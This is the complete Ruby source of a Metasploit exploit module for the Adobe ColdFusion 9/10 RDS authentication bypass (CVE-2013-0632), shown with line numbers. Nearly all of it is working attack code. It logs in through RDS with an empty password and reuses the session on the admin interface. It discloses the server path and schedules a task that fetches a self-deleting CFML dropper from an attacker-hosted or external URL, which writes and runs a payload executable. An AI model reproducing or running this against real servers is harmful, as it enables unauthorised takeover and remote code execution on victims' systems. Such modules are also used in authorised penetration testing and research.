Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7

8
  include Msf::Exploit::Remote::HttpClient
9
  include Msf::Exploit::Remote::HttpServer::HTML
10
  include Msf::Exploit::EXE
11
  include Msf::Module::Deprecated
12

13
  moved_from 'exploit/multi/http/coldfusion_rds'
14

15
  Rank = GreatRanking
16

17
  def initialize(info = {})
18
    super(update_info(info,
19
      'Name'            => 'Adobe ColdFusion RDS Authentication Bypass',
20
      'Description'     => %q{
21
        Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote
22
        attackers to bypass authentication using the RDS component. Due to
23
        default settings or misconfiguration, its password can be set to an
24
        empty value. This allows an attacker to create a session via the RDS
25
        login that can be carried over to the admin web interface even though
26
        the passwords might be different, and therefore bypassing authentication
27
        on the admin web interface leading to arbitrary code execution. Tested
28
        on Windows and Linux with ColdFusion 9.
29
      },
30
      'Author'          =>
31
        [
32
          'Scott Buckel', # Vulnerability discovery
33
          'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
34
        ],
35
      'License'         => MSF_LICENSE,
36
      'References'      =>
37
        [
38
          [ "CVE", "2013-0632" ],
39
          [ "EDB", "27755" ],
40
          [ "URL", "http://www.adobe.com/support/security/bulletins/apsb13-03.html" ]
41
        ],
42
      'Privileged'      => false,
43
      'Stance'          => Msf::Exploit::Stance::Aggressive, #thanks juan!
44
      'Platform'        => ['win', 'linux'],
45
      'Targets'         =>
46
        [
47
         [ 'Windows',
48
            {
49
            'Arch' => ARCH_X86,
50
            'Platform' => 'win'
51
            }
52
          ],
53
          [ 'Linux',
54
            {
55
            'Arch' => ARCH_X86,
56
            'Platform' => 'linux'
57
            }
58
          ],
59
        ],
60
      'DefaultTarget'   => 0,
61
      'DisclosureDate'  => '2013-08-08'
62
    ))
63

64
    register_options(
65
      [
66
        OptString.new('EXTURL', [ false, 'An alternative host to request the CFML payload from', "" ]),
67
        OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
68
      ])
69

70
    register_advanced_options(
71
      [
72
        OptString.new('CFIDDIR', [ true, 'Alternative CFIDE directory', 'CFIDE'])
73
      ])
74
  end
75

76
  def check
77
    uri = target_uri.path
78

79
    #can we access the admin interface?
80
    res = send_request_cgi({
81
      'method' => 'GET',
82
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
83
    })
84

85
    if res && res.code == 200 && res.body.include?('ColdFusion Administrator Login')
86
       vprint_good "Administrator access available"
87
    else
88
      return Exploit::CheckCode::Safe
89
    end
90

91
    #is it cf9?
92
    res = send_request_cgi({
93
      'method' => 'GET',
94
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'images', 'loginbackground.jpg')
95
    })
96

97
    img = Rex::Text.md5(res.body.to_s)
98
    imghash = "596b3fc4f1a0b818979db1cf94a82220"
99

100
    if img == imghash
101
      vprint_good "ColdFusion 9 Detected"
102
    else
103
      return Exploit::CheckCode::Safe
104
    end
105

106
    #can we access the RDS component?
107
    res = send_request_cgi({
108
      'method' => 'POST',
109
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
110
      'vars_post' => {
111
          'method' => "login",
112
          'adminpassword' => "",
113
          'rdsPasswordAllowed' => "1"
114
       }
115
    })
116

117
    if res && res.code == 200 && res.body.include?('true')
118
      return Exploit::CheckCode::Appears
119
    else
120
      return Exploit::CheckCode::Safe
121
    end
122
  end
123

124
  def exploit
125
    @pl           = gen_file_dropper
126
    @payload_url  = ""
127

128
    if datastore['EXTURL'].blank?
129
      begin
130
        Timeout.timeout(datastore['HTTPDELAY']) {super}
131
      rescue Timeout::Error
132
      end
133
      exec_payload
134
    else
135
      @payload_url = datastore['EXTURL']
136
      upload_payload
137
      exec_payload
138
    end
139
  end
140

141
  def primer
142
    @payload_url = get_uri
143
    upload_payload
144
  end
145

146
  def on_request_uri(cli, request)
147
    if request.uri =~ /#{get_resource}/
148
      send_response(cli, @pl)
149
    end
150
  end
151

152
  def autofilter
153
    true
154
  end
155

156
  #task scheduler is pretty bad at handling binary files and likes to mess up our meterpreter :-(
157
  #instead we use a CFML filedropper to embed our payload and execute it.
158
  #this also removes the dependancy of using the probe.cfm to execute the file.
159

160
  def gen_file_dropper
161
    rand_var    = rand_text_alpha(8+rand(8))
162
    rand_file   = rand_text_alpha(8+rand(8))
163

164
    if datastore['TARGET'] == 0
165
      rand_file += ".exe"
166
    end
167

168
    encoded_pl  = Rex::Text.encode_base64(generate_payload_exe)
169

170
    print_status "Building CFML shell..."
171
    #embed payload
172
    shell = ""
173
    shell += " <cfset #{rand_var} = ToBinary( \"#{encoded_pl}\" ) />"
174
    shell += " <cffile action=\"write\" output=\"##{rand_var}#\""
175
    shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
176
    #if linux set correct permissions
177
    if datastore['TARGET'] == 1
178
      shell += " mode = \"700\""
179
    end
180
    shell += "/>"
181
    #clean up our evil .cfm
182
    shell += " <cffile action=\"delete\""
183
    shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##listlast(cgi.script_name,\"/\")#\"/>"
184
    #execute our payload!
185
    shell += " <cfexecute"
186
    shell += " name = \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
187
    shell += " arguments = \"\""
188
    shell += " timeout = \"60\"/>"
189

190
    return shell
191
  end
192

193
  def exec_payload
194
    uri = target_uri.path
195

196
    print_status("Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}")
197
    print_status("Executing payload...")
198

199
    res = send_request_cgi({
200
      'method' => 'GET',
201
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], @filename)
202
    })
203
  end
204

205
  def upload_payload
206
    uri = target_uri.path
207

208
    @filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea
209
    taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea
210

211
    print_status "Trying to upload payload via scheduled task..."
212
    res = send_request_cgi({
213
      'method' => 'POST',
214
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
215
      'vars_post' => {
216
          'method' => "login",
217
          'adminpassword' => "",
218
          'rdsPasswordAllowed' => "1"
219
       }
220
    })
221

222
    unless res && res.code == 200
223
      fail_with(Failure::Unknown, "#{peer} - RDS component was unreachable")
224
    end
225

226
    #deal with annoying cookie data prepending (sunglasses)
227
    cookie = res.get_cookies
228

229
    if res && res.code == 200 && cookie =~ /CFAUTHORIZATION_cfadmin=;(.*)/
230
      cookie = $1
231
    else
232
      fail_with(Failure::Unknown, "#{peer} - Unable to get auth cookie")
233
    end
234

235
    res = send_request_cgi({
236
      'method' => 'GET',
237
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
238
      'cookie' => cookie
239
    })
240

241
    if res && res.code == 200 && res.body.include?('ColdFusion Administrator')
242
      print_good("Logged in as Administrator!")
243
    else
244
      fail_with(Failure::Unknown, "#{peer} - Login Failed")
245
    end
246

247
    #get file path gogo
248
    res = send_request_cgi({
249
      'method' => 'GET',
250
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'settings', 'mappings.cfm'),
251
      'vars_get' => {
252
        'name' => "/CFIDE"
253
      },
254
      'cookie' => cookie
255
    })
256

257
    unless res && res.code == 200
258
      fail_with(Failure::Unknown, "#{peer} - Mappings URL was unreachable")
259
    end
260

261
    if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/
262
      file_path = $1
263
      print_good("File path disclosed! #{file_path}")
264
    else
265
      fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
266
    end
267

268
    print_status("Adding scheduled task")
269
    res = send_request_cgi({
270
      'method' => 'POST',
271
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'),
272
      'vars_post' => {
273
        'TaskName' => taskname,
274
        'Start_Date' => "Nov 1, 2420",
275
        'End_Date' => "",
276
        'Interval' => "",
277
        'ScheduleType' => "Once",
278
        'Operation' => "HTTPRequest",
279
        'ScheduledURL' => @payload_url,
280
        'publish' => "1",
281
        'publish_file' => "#{file_path}\\#{@filename}",
282
        'adminsubmit' => "Submit"
283
      },
284
      'cookie' => cookie
285
    })
286

287
    unless res && res.code == 200 || res.code == 302 #302s can happen but it still works, http black magic!
288
      fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
289
    end
290

291
    print_status("Running scheduled task")
292
    res = send_request_cgi({
293
      'method' => 'GET',
294
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
295
      'vars_get' => {
296
        'runtask' => taskname,
297
        'timeout' => "0"
298
      },
299
      'cookie' => cookie
300
      })
301

302
    if res && res.code == 200 && res.body.include?('This scheduled task was completed successfully')
303
      print_good("Scheduled task completed successfully")
304
    else
305
      fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
306
    end
307

308
    print_status("Deleting scheduled task")
309
    res = send_request_cgi({
310
      'method' => 'GET',
311
      'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
312
      'vars_get' => {
313
        'action' => "delete",
314
        'task' => taskname
315
      },
316
      'cookie' => cookie
317
    })
318

319
    unless res && res.code == 200
320
      print_error("Scheduled task deletion failed, cleanup might be needed!")
321
    end
322
  end
323
end
324

325